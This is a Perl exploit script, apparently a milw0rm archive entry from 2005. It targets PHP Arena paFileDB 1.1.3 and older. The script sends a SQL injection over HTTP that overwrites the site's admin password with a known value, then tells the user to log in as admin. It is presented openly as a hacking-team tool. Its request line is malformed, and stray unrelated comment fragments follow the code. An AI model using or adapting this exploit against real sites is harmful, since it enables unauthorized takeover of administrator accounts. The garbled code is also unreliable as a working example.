#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
# #
# + Discovered By: GulfTech #
# + Advisory: http://www.securityfocus.com/bid/13967 #
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
#And Iranian Security & Hacking Groups: #
# #
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard & Emperor #
######################################################################################
use IO::Socket;
if (@ARGV < 2)
{
print "n====================================================n";
print " n PHPArena Exploit By Alpha Programmernn";
print " Trap-Set Underground Hacking Team nn";
print " Usage: <T4rg3t> <DIR>nn";
print "====================================================nn";
print "Examples:nn";
print " xpl.pl www.Site.com / n";
exit();
}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "nn[+] C0nn3ctedn";
$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*n";
$http .= "Host: $hostnrnr";
print "[+] Injecting SQL Commands ...n";
sleep(1);
print "[+] Changing Admin's Password ...n";
print $remote $http;
sleep(1);
while (<$remote>)
{
}
print "[+] Now , Login With This Password :n";
print "Password : trapsetnn";
print "Enjoy ;) nn";
# milw0rm.com [2005-06-15]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666